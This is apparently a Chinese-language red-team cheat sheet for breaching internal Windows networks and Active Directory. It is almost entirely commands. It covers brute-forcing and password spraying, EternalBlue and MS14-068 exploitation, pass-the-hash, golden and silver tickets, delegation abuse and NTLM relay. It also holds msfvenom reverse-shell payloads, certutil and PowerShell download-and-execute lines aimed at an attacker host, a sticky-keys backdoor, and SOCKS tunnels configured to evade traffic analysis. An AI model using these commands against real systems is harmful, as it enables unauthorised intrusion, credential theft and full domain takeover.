80,81,82,83,84,85,86,87,88,89,90,91,901,18080,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,443,8443,7001
https://github.com/k8gege/Aggressor
beacon>Cscan 192.168.0.0/24 OnlinePC
beacon>Cscan 192.168.0.0/24 MS17010
beacon>Cscan 192.168.0.0/24 Osscan
beacon>Cscan 192.168.0.0/24 WebScan
上传账户密码文件user.txt、pass.txt到beacon目录(beacon>pwd)
beacon>Cscan 192.168.0.0/24 FtpScan
上传账户密码文件user.txt、pass.txt到beacon目录(beacon>pwd)
beacon>Cscan 192.168.0.0/24 WmiScan
beacon>Cscan 192.168.0.0/24 CiscoScan
枚举共享
beacon> EnumShare
beacon> EnumMSSQL
建立连接
>net use \\192.168.1.2\ipc$ "password" /user:domain\administrator
查看连接
>net use
列文件
>dir \\192.168.1.2\c$
查看系统时间
>net time \\192.168.1.2
上传文件
>copy 1.exe \\192.168.1.2\c$
下载文件
>copy \\192.168.1.2\c$\1.exe 1.exe
批量IPC
@echo off
echo check ip addr config file…
if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto end
echo read and analysis file…
for /F "eol=#" %%i in (ip.txt) do start PsExec.exe \\%%i -accepteula -u administrator -p "123456" cmd & start cmd /c PsExec.exe \\%%i -u administrator -p "123456" cmd
:end
exit
Schtasks
>net use \\192.168.1.2\ipc$ "password" /user:domain\administrator
>copy 1.exe \\192.168.1.2\c$
>net time \\192.168.1.2
>at \\192.168.1.2 1:00AM c:\1.exe
>at \\192.168.1.2 1:00AM cmd.exe /c “ipconfig >c:/1.txt”
>type \\192.168.1.2\c$\1.txt
查看计划任务
>at \\192.168.1.2
删除计划任务
>at \\192.168.1.2 计划ID /delete
横向批量上线
>atexec.exe ./administrator:pass@10.1.1.1 "certutil.exe -urlcache -split -f http://youip.com:80/shell.txt c:/windows/debug/SysDug.exe"
>atexec.exe ./administrator:pass@10.1.1.1 "c:/windows/debug/SysDug.exe"
>atexec.exe ./administrator:pass@10.1.1.1 "certutil.exe -urlcache -split -f c:/windows/debug/SysDug.exe delete"
>net use \\192.168.0.55\ipc$ "password" /user:"domain\administrator"
>schtasks /query /fo LIST /v 查看计划任务
上传文件
>copy ok.exe \\192.168.0.55\c$\windows\temp
远程创建定时任务
>schtasks /create /s "192.168.0.55" /u "admin" /p "qqq23" /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\ok.exe" /sc DAILY /mo 1 /ST 20:28 /RU SYSTEM
查询远程创建的任务
>schtasks /query /s "192.168.0.55" /U "admin" /P "qqq23" | findstr "windowsupdate"
立即执行远程任务
>schtasks /run /tn windowsupdate /s "192.168.0.55" /U "admin" /P "qqq23"
删除定时任务
>schtasks /Delete /tn windowsupdate /F /s "192.168.0.55" /u "admin" /p "qqq23"
删除IPC
>net user name /del /y
横向批量上线
>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy ok.exe \\%i\admin$\debug\ /Y ) & wmic /NODE:"%i" /user:"administrator" /password:"password" PROCESS call create "c:\windows\debug\ok.exe" & @ping 127.0.0.1 -n 8 >nul & net use \\%i\admin$ /del
>net use \\192.168.0.55\ipc$ "password" /user:"domain\administrator"
>copy ok.exe \\192.168.0.55\c$\windows\temp
>wmic /NODE:" 192.168.0.55" /user:"administrator" /password:"password" PROCESS call create "c:\windows\temp\ok.exe"
>del \\192.168.0.55\c$\windows\temp\ok.exe /F
>net use \\192.168.0.55\c$ /del
>psexec –accepteula @ips.txt –u admin –p pass@123 –c 1.bat
#1.bat内容
tasklist /v | find “域管理名字”
@echo off
echo check ip addr config file…
if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto end
echo read and analysis file…
for /F “eol=#” %%i in (ip.txt) do echo %%i &(echo %%i &tasklist /s %%i /u administrator /p pass@123 /v) >>d:\result.txt
:end
exit
# route add 内网网卡ip 子网掩码 session的id
# route list
&
Meterpreter>run get_local_subnets查看网段信息再添加路由
# run autoroute -s内网网卡ip/24
# run autoroute -p 查看路由表
&
Meterpreter>run post/multi/manage/autoroute
在已经获得meterpreter的机器上配置管道监听器
meterpreter > pivot add -t pipe -l 已控IP -n bgpipe -a x86 -p windows
生成
>msfvenom -p windows/meterpreter/reverse_named_pipe PIPEHOST=已控IP PIPENAME=bgpipe -f exe -o pipe.exe.
代理
SSH动态转发,是建立正向加密的socks通道
出网靶机编辑后restart ssh服务
#vim /etc/ssh/sshd_conf
AllowTcpForwarding yes 允许TCP转发
GatewayPorts yes 允许远程主机连接本地转发的端口
TCPKeepAlive yes TCP会话保持存活
PasswordAuthentication yes 密码认证
外部攻击机执行
>ssh -C -f -N -g -D 0.0.0.0:12138 root@出网靶机IP -p 22
MSF中设置全局代理或使用其他软件
>setg proxies socks5:0.0.0.0:12138
即可进行攻击隔离区机器
#vim /etc/ssh/sshd_conf
AllowTcpForwarding yes 允许TCP转发
GatewayPorts yes 允许远程主机连接本地转发的端口
TCPKeepAlive yes TCP会话保持存活
PasswordAuthentication yes 密码认证
ClientAliveInterval 修改为30-60保持连接
ClientAliveCountMax 取消注释 发送请求没响应自动断开次数
107是外网攻击机
内网靶机执行:
>ssh -p 22 -qngfNTR 12138:127.0.0.1:22 root@192.168.0.107
攻击机执行
>ssh -p 12138 -qngfNTD 12345 root@192.168.0.107
隧道建立,可使用代理软件配置攻击机外网IP:12345访问内网
生成木马
>msfvenom -p windows/x64/meterpreter/bind_tcp_rc4 rc4password=123456 lport=446 -f exe -o /var/www/html/bind.exe
MSF设置
>setg proxies socks5:0.0.0.0:12138
>use exploit/multi/handler
>set payload windows/x64/meterpreter/bind_tcp_rc4
>set rc4password 123456
>set rhost 10.1.1.97
>set lport 446
>msfvenom -p windows/x64/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=公网IP LPORT=12138 -f exe –o /var/www/html/1.exe
Handler监听本地IP:12138
SSH转发
>ssh -N -R 12138:本地内网IP:12138 root@公网IP
#use auxiliary/server/socks4a
#set srvhost 0.0.0.0
#set srvport 1080
#run
多层网络
再多配置个端口
Win: Proxifier& Sockscap64
Linux: proxychains& 浏览器
&
meterpreter > ipconfig
IP Address : 10.1.13.3
meterpreter > run autoroute -s 10.1.13.0/24
meterpreter > run autoroute -p
10.1.13.0 255.255.255.0 Session 1
meterpreter > bg
msf auxiliary(tcp) > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 10.1.13.2
msf exploit(psexec) > exploit
#use auxiliary/server/socks5
#set srvhost 0.0.0.0
#set srvport 1080
#run
浏览器
reGeorg
https://github.com/sensepost/reGeorg
>python reGeorgSocksProxy.py -u http://靶机/tunnel.aspx -l 外网IP -p 10080
打开Proxifier,更改为脚本指定的端口10080
或proxychains
#vim /etc/proxychains.conf
去掉dynamic_chain注释>添加socks5 127.0.0.1 10080
或MSF
或MSF
>setg proxies socks5:外网IP:10080
>setg ReverseAllowProxy true 允许反向代理
Step 1. 设置密码生成 tunnel.(aspx|ashx|jsp|jspx|php) 并上传到WEB服务器
$ python3 neoreg.py generate -k password
伪装页面
$ python3 neoreg.py generate -k <you_password> --file 404.html
Step 2. 使用 neoreg.py 连接WEB服务器,在本地建立 socks 代理
$ python3 neoreg.py -k password -u http://xx/tunnel.php
$ python3 neoreg.py -k <you_password> -u <server_url> --skip
开启代理
$ python neoreg.py -k <you_password> -l 外网IP -p 10081 -u http://xx/neo-tunnel.aspx
ABPTTS端口转发
https://github.com/nccgroup/ABPTTS
端口转发
>python abpttsfactory.py -o webshell 生成shell
./webshell目录下生成的相应脚本文件传入目标中
>python abpttsclient.py -c webshell/config.txt -u "http://目标网址/trans.aspx" -f 攻击机IP:12345/目标IP:3389
ABPTTS转发内网其他机器端口
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:33890/10.1.1.105:3389
要转发多个机器或多个端口
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:33890/10.1.1.105:3389 -f 192.168.0.107:33891/10.1.1.101:80 -f 192.168.0.107:33892/10.1.1.102:22
SSH代理一级网段
需要一台有权限的Linux靶机
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:33890/10.1.1.108:22
>ssh -p 222 -qTfnN -D 0.0.0.0:1081 root@192.168.0.107
配置proxychains即可
SSH代理二级网段
需要靶机web权限,一级内网一台web权限
转发内网web出来传入abptts的shell
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:8080/10.1.1.108:80
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.107/qq.aspx -f 192.168.0.107:222/10.1.1.106:22
SSH连接192.168.0.107:222即可到达二级网络
反弹msf
kali生成bind型脚本
>msfvenom -p linux/x64/shell_bind_tcp LPORT=12138 -f elf -o shell
在二级不出网linux上执行
将他的12138端口通过abptts转出
>python abpttsclient.py -c webshell/config.txt -u http://192.168.0.98/qq.aspx -f 192.168.0.107:13128/10.1.1.101:12138
Msf本地监听13128即可
>python proxy.py -u http://192.168.0.98/tunnel.aspx -l 12138 -r 3389 –v
>ew –s ssocksd –l 888
连接sockscap64靶机外网IP+端口888
反弹socks5(目标机无外网IP):
外网攻击机:
>ew -s rcsocks -l 1008 -e 888
-l为socks软件连接的端口,-e为目标主机和vps的通信端口。
靶机:
>ew -s rssocks -d 外网IP -e 1008
sockscap64连接攻击机外网IP+端口1008
二级环境(A有外网,B内网无外网):
靶机B:
>ew –s ssocksd –l 888
靶机A:
>ew –s lcx_tran –l 1080 –f 靶机B –g 888
Sockscap64连接靶机外网IP+端口 1080
外网攻击机:
>ew –s lcx_listen –l 10800 –e 888
靶机B:
>ew –s ssocksd –l 999
靶机A:
>ew -s lcx_slave -d 外网 -e 8888 -f 靶机B -g 9999
Sockscap64连接攻击机外网IP+端口 10080
三级环境(A无外网,B内网无外网通A,C通B):
外网攻击机:
>ew -s rcsocks -l 1008 -e 888
靶机A:
>ew -s lcx_slave -d 外网攻击机 -e 888 -f 靶机B -g 999
靶机B:
>ew -s lcx_listen -l 999 -e 777
靶机C:
>ew -s rssocks -d靶机B -e 777
Sockscap64连接攻击机外网IP+端口 1008
https://github.com/fatedier/frp/releases/
使用条件:目标主机通外网,拥有自己的公网ip
对攻击机外网服务端frps.ini进行配置
[common]
bind_port=8080
靶机客户端
[common]
server_addr=服务器端外网IP
server_port=8080
[socks5]
type=tcp
remote_port=12345
plugin=socks5
use_encryption=true
use_compression=true
以上是启用加密和压缩,能躲避流量分析设备。
上传frpc.exe和frpc.ini到目标服务器上,直接运行frpc.exe(在实战中可能会提示找不到配置文件,需要使用-c参数指定配置文件的路径frpc.exe -c 文件路径),可以修改文件名和配置名以混淆视听。
公网vps主机上运行./frps –c frps.ini
靶机执行./frpc –c frpc.ini
MSF中设置全局变量
>setg proxies 公网IP:12345
>setg ReverseAllowProxy true 运行反向代理
结束攻击
tasklist
taskkill /pid 进程号 -t –f
https://github.com/securesocketfunneling/ssf/releases
边界机器执行:
>ssfd.exe -p 1080 linux执行:./ssfd -p 1080
攻击机执行:
>ssf.exe -D 12138 -p 1080 192.168.0.98(边界机器IP)
本机配置proxychain或proxifier
反向socks代理
攻击机执行:
>ssfd.exe -p 1080
内网机器执行:
>ssf.exe -F 12138 -p 1080 192.168.0.106(攻击机IP)
多级内网机执行:
>ssfd.exe -p 1080 -c config.json
Json文件加入字段
"circuit": [
{"host": "A中继机IP", "port":"1080"},
{"host": "B中继机IP", "port":"1080"}
],
所有中继机执行:
>ssfd.exe -p 1080 -c config.json
边界机器执行:
>ssf.exe -c config.json -p 1080 多级内网机IP -X 12138
边界机执行:
>nc.exe 127.0.0.1 12138即可获得多级内网机cmdshell
攻击机执行:
>ssfd.exe -p 1080 -c config.json
内网机器执行
攻击机执行:
>nc 127.0.0.1 12138
https://github.com/shadowsocks/libQtShadowsocks/releases/download/v2.0.2/shadowsocks-libqss-v2.0.2-win64.7z
靶机新建配置文件1.json,内容为
{
"server":"0.0.0.0",
"server_port":13337,
"local_address":"127.0.0.1",
"local_port":1080,
"password":"123456",
"timeout":300,
"method":"aes-256-cfb",
"fast_open":false,
"workers": 1
}
执行
>shadowsocks-libqss.exe -c 1.json –S
攻击机配置
浏览器或其他攻击软件配置代理127.0.0.1:1080即可(需有http(s)/socks5功能)
https://github.com/snail007/goproxy/releases
靶机执行
>proxy.exe socks -t tcp -p "0.0.0.0:13337"
攻击机配置Proxifier
https://github.com/jpillora/chisel/releases
攻击机监听
>chisel.exe server -p 12138 --reverse
靶机执行
>chisel.exe client 192.168.0.102:12138 R:12345:127.0.0.1:12346
靶机执行
>chisel.exe server -p 12346 --socks5
攻击机执行
>chisel.exe client 127.0.0.1:12345 socks
当隧道建立成功时,攻击机本地会启动1080端口
即可使用
https://ngrok.com/
https://www.ngrok.cc/
下载ngrok
#ngrok authtoken 授权码
#ngrok http 8080
#ngrok tcp 8888
Sockscap64
Proxifier
Proxychains
#vim /etc/proxychains.conf
去掉dynamic_chain注释>添加socks4 127.0.0.1 1080
#cp /usr/lib/proxychains3/proxyresolv /usr/bin
https://ngrok.com/
https://www.ngrok.cc/
下载ngrok
#ngrok authtoken 授权码
#ngrok http 8080
#ngrok tcp 8888
扫描
#use auxiliary/scanner/smb/smb_ms17_010
#set rhosts 192.168.1.0/24
&
#nmap -sT -p 445,139 -open -v -Pn --script=smb-vuln-ms17-010.nse 10.11.1.0/20
攻击
#use exploit/windows/smb/ms_17_010_eternalblue易蓝屏
#set payload windows/x64/meterpreter/reverse_tcp
#use auxiliary/admin/smb/ms17_010_command
#set command REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /t REG_SZ /v Debugger /d \"C:\\windows\\system32\\cmd.exe\" /f
MS08_067
#nmap -sT -p 445,139 -open -v -Pn --script=smb-vuln-ms08-067.nse 10.11.1.0/20
#use exploit/windows/smb/ms08_067_netapi
#set payload windows/meterpreter/reverse_tcp
CVE-2019-0708
攻击MySQL数据库
#use auxiliary/scanner/mysql/mysql_version 主机发现
#use auxiliary/scanner/mysql/mysql_login MYSQL爆破
#use exploit/multi/mysql/mysql_udf_payload UDF提权
#use exploit/windows/mysql/mysql_mof MOF提权
#use auxiliary/admin/mysql/mysql_sql 执行命令
>PowerShell -Command "[System.Data.Sql.SqlDataSourceEnumerator]::Instance.GetDataSources()" 列出域内mssql主机
https://github.com/NetSPI/PowerUpSQL
>Get-SQLInstanceLocal #发现本机SQLServer实例
>Get-SQLInstanceDomain #发现域中的SQLServer实例
>Get-SQLInstanceBroadcast #发现工作组SQLServer实例
>$Targets = Get-SQLInstanceBroadcast -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username sa -password admin | Where-Object {$_.Status -like "Accessible"} 工作组mssql爆破
>$Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username sa -password admin | Where-Object {$_.Status -like "Accessible"}
>Get-SQLInstanceBroadcast -Verbose | Get-SQLServerLoginDefaultPw –Verbose
>$Targets 域内MSSQL爆破
Nishang脚本爆破MSSQL
>Invoke-BruteForce -ComputerName dc.zone.com -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose -StopOnSuccess
#use auxiliary/scanner/mssql/mssql_login 爆破主机
#use auxiliary/admin/mssql/mssql_exec 调用cmd
#use auxiliary/admin/mssql/mssql_sql 执行SQL语句
#use exploit/windows/mssql/mssql_payload 上线MSSQL主机
http://192.168.0.107/ps/nishang/Execution/Execute-Command-MSSQL.ps1
导入nishang执行MSSQL命令的脚本
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/nishang/Execution/Execute-Command-MSSQL.ps1')
>Execute-Command-MSSQL -ComputerName 192.168.0.98 -UserName sa -Password admin 会返回powershell
#use auxiliary/scanner/mssql/mssql_hashdump 导出MSSQL密码
已知服务器ntlmhash,未知mssql账号密码
Hash注入+socks无密码连接mssql
>mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:. /ntlm:{hash} /run:\"C:\*\SocksCap64\SocksCap64_RunAsAdmin.exe\"" "exit"
将SSMS.exe加入sockscap中启动
命令行版sqltool
https://github.com/uknowsec/SharpSQLTools
隔离主机一般与攻击机无双向路由,payload设置为bind让靶机监听。
>set payload windows/meterpreter/bind_tcp
>set RHOST 隔离机IP
参数:
-l 指定的用户名 -p 指定密码
-L 用户名字典 -P 密码字典
-s 指定端口 -o 输出文件
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 mysql
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 ssh -s 22 -t 4
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 mssql -vv
>hydra -L /root/user.txt -P pass.txt 10.1.1.10 rdp -V
>hydra -L /root/user.txt -P pass.txt smb 10.1.1.10 -vV
>hydra -L /root/user.txt -P pass.txt ftp://10.1.1.10
参数:
-h 目标名或IP -H 目标列表
-u 用户名 -U 用户名字典
-p 密码 -P 密码字典 -f 爆破成功停止 -M 指定服务 -t 线程
-n 指定端口 -e ns 尝试空密码和用户名密码相同
>medusa -h ip -u sa -P /pass.txt -t 5 -f -M mssql
>medusa -h ip -U /root/user.txt -P /pass.txt -t 5 -f -M mssql
域内爆破
https://github.com/ropnop/kerbrute
用户枚举
>kerbrute_windows_amd64.exe userenum -d zone.com username.txt
密码喷射
>kerbrute_windows_amd64.exe passwordspray -d zone.com use.txt password
密码爆破
此项会产生日志
>kerbrute_windows_amd64.exe bruteuser -d zone.com pass.txt name
组合爆破
格式为username:password
>kerbrute_windows_amd64.exe -d zone.com bruteforce com.txt
https://github.com/dafthack/DomainPasswordSpray
自动收集账户进行密码喷射
>Invoke-DomainPasswordSpray -Password pass
组合爆破
>Invoke-DomainPasswordSpray -UserList users.txt -Domain zone.com -PasswordList passlist.txt -OutFile result.txt
会产生日志
单密码
>Invoke-DomainPasswordSpray -UserList users.txt -Domain zone.com -Password password
msfvenom生成一个x64或x86的dll文件,替换该工具下的x64.dll或x86.dll
windows server 2008 ,msfvenom生成x64.dll文件
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f dll > x64.dll
msf配置
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lport 12345
set lhost 192.168.0.107
将该x64.dll替换到方程式利用工具下面。
只需要更换目标的IP,就可以获取session。
windows server 2003 ,msfvenom生成x86.dll文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=12345 -f dll > x86.dll
msf配置
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lport 12345
set lhost 192.168.0.107
通过ms17_010_commend模块执行系统命令添加用户至管理员。再指定SMBPass和SMBUser来建立windows可访问命名管道
Kerberoasting
https://github.com/nidem/kerberoast
>setspn -T 域名 -Q */*
Powershell
https://github.com/PyroTek3/PowerShell-AD-Recon
Powerview
>Get-NetComputer -SPN termsrv*
>Get-NetUser -SPN
>import module GetUserSPNs.ps1
>usemodule situational_awareness/network/get_spn
>Add-Type -AssemblyName System.IdentityModel
>New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "SPN"
&
>kerberos::ask /target:SPN
mimikatz>kerberos::list /export
>python tgsrepcrack.py word.txt file.kirbi
https://github.com/leechristensen/tgscrack
>python extractServiceTicketParts.py file.kirbi
>tgscrack.exe -hashfile hash.txt -wordlist word.txt
>python kerberoast.py -p Password123 -r file.kirbi -w new.kirbi -u 500
>python kerberoast.py -p Password123 -r file.kirbi -w new.kirbi -g 512
注入内存、
>kerberos::ptt new.kirbi
https://github.com/SecureAuthCorp/impacket
请求TGS
>python GetUserSPNs.py -request -dc-ip 10.1.1.1 zone.com/y
破解
>hashcat -m 13100 -a 0 kerberos.txt wordlist.txt
当用户关闭了kerberos预身份认证时可以进行攻击
>Rubeus.exe asreproast /user:y /dc:10.1.1.100 /domain:zone.com
或使用Powerview结合https://github.com/gold1029/ASREPRoast
获取不要求kerberos预身份验证的域内用户
>Get-DomainUser -PreauthNotRequired -Properties distinguishedname –Verbose
>Get-ASREPHash -UserName y -Domain zone.com -Verbose
破解RC4-HMAC AS-REP
>john hash.txt --wordlist=wordlist.txt
允许本地管理组所有成员连接
>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
>powershell -ep bypass
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-TheHash/Invoke-WMIExec.ps1');
>IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-TheHash/Invoke-TheHash.ps1');
>Invoke-TheHash -Type WMIExec -Target 192.168.0.0/24 -Domain zone.com -Username godadmin -Hash f1axxxxxxxxxb771
>net use \\1.1.1.1\admin$ /user:"administrator" "password"
>copy windowsupdate.exe \\1.1.1.1\admin$\dir\
>wmic /NODE:"1.1.1.1" /user:"administrator" /password:"password" PROCESS call create "c:\windows\dir\windowsupdate.exe"
>del \\1.1.1.1\admin$\dir\windowsupdate.exe /F
>net use \\1.1.1.1\admin$ /del
https://github.com/SecureAuthCorp/impacket
>python wmiexec.py -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09 域名/Administrator@192.168.11.1 "whoami"
>python wmiexec.py admin@192.168.1.2
半交互式:
>cscript //nologo wmiexec.vbs /shell 192.168.1.2 admin pass
单条命令
>cscript //nologo wmiexec.vbs /cmd 192.168.1.2 domain\admin pass "whoami"
下载执行
>wmic /node:192.168.0.115 /user:godadmin /password:password PROCESS call create "cmd /c certutil.exe -urlcache -split -f http://192.168.0.107/clickme.exe c:/windows/temp/win.exe & c:/windows/temp/win.exe & certutil.exe -urlcache -split -f http://192.168.0.107/clickme.exe delete"
>wmic /NODE:192.168.3.108 /user:"godadmin" /password:"password" PROCESS call create "powershell -nop -exec bypass -c \"IEX(New-Object Net.WebClient).DownloadString('http://192.168.0.107/xxx.txt');\""
Invoke-WMIExec
>powershell -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-WMIExec.ps1');Invoke-WMIExec -Target 192.168.0.115 -Domain Workgroup -Username godadmin -Hash f1a5b1a3641bec99ff92fe9df700b771 -Command \"net user admin Qwe@123 /add\" -Verbose"
>powershell -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/Invoke-WMIExec.ps1');Invoke-WMIExec -Target 192.168.0.115 -Domain Workgroup -Username godadmin -Hash f1xxxxxxxxxxxxx771 -Command \"mshta http://192.168.0.107:8080/YAyAPN6odzbAzKn.hta\" -Verbose"
>psexec.exe -hashes AAD3B435B51404EEAAD3B435B51404EE:A812E6C2DEFCB0A7B80868F9F3C88D09域名/Administrator@192.168.1.1 "whoami"
>psexec.exe –accepteula \\192.168.1.2 –u admin –p pass cmd.exe 无确认窗
Msf
#use exploit/windows/smb/psexec
#use exploit/windows/smb/psexec_psh(powershell版本)
Windows XP、Vista、2008、7、2008 r2 和2012没有安装KB2871997补丁的机器上,使用NTLM进行PTH
mimikatz # privilege::debug
mimikatz # sekurlsa::pth /user:admin /domain:xxx.com /ntlm:{ntlm}
执行一个文件
mimikatz # sekurlsa::pth /user:admin /domain:xxx.com /ntlm:{ntlm} /run:powershell.exe
Windows 8.1 、2012 R2、安装KB2871997的Win 7 、2008 R2和2012上可使用AES KEY进行PTH
>privilege::debug
>sekurlsa::ekeys
>sekurlsa::pth /user:administrator /domain:zone.com /aes128:{key}
>pth-winexe -U godadmin%password --system --ostype=1 //192.168.0.115 cmd
>python smbexec.py administrator@192.168.0.98
名词
KDC(Key Distribution Center):密钥分发中心,里面包含两个服务:AS和TGS
AS(Authentication Server):身份认证服务
TGS(Ticket Granting Server):票据授予服务
TGT(Ticket Granting Ticket): 由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时
Golden Ticket伪造TGT(Ticket Granting Ticket),可以获取任何Kerberos服务权限,
域控中提取krbtgt的hash
域控:dc.zone.com
域内机器:sub2k8.zone.com
域内普通用户:y
域内机器是不能访问dc上的文件
清空票据
域控中获取krbtgt用户的信息
>privilege::debug
>mimikatz log "lsadump::dcsync /domain:zone.com /user:krbtgt"
获取信息:/domain、/sid、/aes256
在sub2k8中生成golden ticket
>mimikatz “kerberos::golden /krbtgt:{ntlmhash} /admin:域管理 /domain:域名 /sid:sid /ticket:gold.kirbi”
导入
Mimikatz#kerberos::ptt 123.kirbi
Silver Ticket是伪造的TGS,只能访问指定服务权限
域控:dc.zone.com
域内机器:sub2k8.zone.com
域内普通用户:y
域控中导出
>privilege::debug
>sekurlsa::logonpasswords
Sub2k8伪造票据
>mimikatz "kerberos::golden /domain:zone.com /sid:{SID} /target:dc.zone.com /service:cifs /rc4:{NTLM} /user:y /ptt"
https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
https://github.com/crupper/Forensics-Tool-Wiki/blob/master/windowsTools/PsExec64.exe
域控:dc.zone.com/10.1.1.100
域内机器:sub2k8.zone.com/10.1.1.98
域内普通用户:y,
Sub2k8中清除票据
Mimikatz#kerberos::purge
>whoami /user查看SID
创建ccache票据文件
> MS14-068.exe -u y@zone.com -p password -s S-1-5-21-2346829310-1781191092-2540298887-1112 -d dc.zone.com
注入票据
Mimikatz# Kerberos::ptc c:\xx\xx\xxx.ccache
psexec无密码登陆
>PsExec.exe \\dc.xx.com\ cmd.exe
>whoami /user 查看SID
msf >use auxiliary/admin/kerberos/ms14_068_kerberos_checksum
msf >set domain 域名
msf >set password 密码
msf >set rhost 域控机器
msf >set user 用户
msf >set user_sid sid
得到.bin文件
#apt-get install krb5-user
上传mimikatz和bin文件
Mimikatz# Kerberos::clist “xxxx.bin” /export
生成kirbi文件
Meterpreter >load kiwi
Meterpreter >download c:/wmpub/xxxxxx.kirbi /tmp/
注入票据
Meterpreter >kerberos_ticket_use /tmp/xxxxxx.kirbi
#use exploit/windows/local/current_user_psexec
#set TECHNIQUE PSH
#set RHOST dc.xx.com
#set payload windows/meterpreter/reverse_tcp
#set LHOST 192.168.1.1
#set session 1
#exploit
#exploit
kali下
#apt-get install krb5-user
#goldenPac.py –dc-ip 10.1.1.100 –target-ip 10.1.1.100 zone.com/y:password@dc.zone.com
设置用户y为服务账户(服务账户有委派权限)
>setspn -U -A variant/golden y
查询非受限委派域内账号,使用powerview
>Get-NetUser -Unconstrained -Domain zone.com
利用
管理员权限打开mimikatz导出TGT
>privilege::debug
>sekurlsa::tickets /export
清空票据,导入票据
获得Powershell会话
> Enter-PSSession -ComputerName dc.zone.com
查询受限委派用户
> Get-DomainUser -TrustedToAuth –Domain zone.com
查询受限委派主机
> Get-DomainComputer -TrustedToAuth -Domain zone.com
利用方法后见权限维持模块
获取域管理员
>Get-DomainUser|select -First 1
域对象信息
>Get-DomainObject -Identity 'DC=zone,DC=com'
ms-ds-machineaccountquota允许非特权用户将最多 10 台计算机连接到域
查看有没有设置msDS-AllowedToActOnBehalfOfOtherIdentity策略
>Get-DomainComputer dc|select name, msDS-AllowedToActOnBehalfOfOtherIdentity
用powermad添加一具备SPN的机器账户
https://github.com/Kevin-Robertson/Powermad
>New-MachineAccount -MachineAccount newcom
或
>$pass = ConvertTo-SecureString '123qwe!@#' -AsPlainText –Force
>New-MachineAccount –MachineAccount newcom -Password $pass
或
>New-MachineAccount -MachineAccount newcom -Password $(ConvertTo-SecureString '123qwe!@#' -AsPlainText -Force)
获取添加的机器账户的SID
将添加的机器账户的SID设置给DC的msDS-AllowedToActOnBehalfOfOtherIdentity参数
>$SD=New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2346829310-1781191092-2540298887-1122)"; $SDBytes = New-Object byte[] ($SD.BinaryLength);$SD.GetBinaryForm($SDBytes, 0);Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
设置完成后查看
配置ACL允许访问
>$RawBytes=Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity' |select -expand msds-allowedtoactonbehalfofotheridentity;$Descriptor= New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes,0;$Descriptor.DiscretionaryAcl
此时使用创建的机器账户的hash可伪造域管
先获取newcom的NTLM
>Rubeus.exe hash /password:123qwe!@# /user:newcom /domain:zone.com
导入票据伪造域管用户访问cifs服务
>Rubeus.exe s4u /user:newcom$ /rc4:00AFFD88FA323B00D4560B F9FEF0EC2F /impersonateuser:godadmin /msdsspn:cifs/dc.zone.com /ptt
成功获取到godadmin的tgs
>python ntlmrelayx.py -t ldaps://dc.zone.com --remove-mic --delegate-access -smb2support
>python printerbug.py zone.com/y@win7.zone.com 192.168.0.attack
>python getST.py -spn host/win7.zone.com 'zone.com/机器账户$:密码' -impersionate administrator -dc-ip 192.168.0.1
>export KRB5CCNAME=XX.ccahe
>python secretdump.py -k -no-pass dc.zone.com -just-dc
域控需启用ldaps,域机器启用ipv6
*当执行ntlmrelayx脚本时,遇到报错
修改
impacket/impacket/examples/ntlmrelayx/attacks/ldapattack.py ldapattack.py脚本,在510行上方加入
if self.config.interactive:
再重新安装>python setup.py install
使用mitm6通过ipv6接管dns服务器,配置好后开始请求网络的WPAD
>mitm6 -i eth1 -d zone.com
使用ntlmreplyx.py监听
>python ntlmrelayx.py -t ldaps://dc.zone.com -debug -ip 10.1.1.101 --delegate-access --add-computer
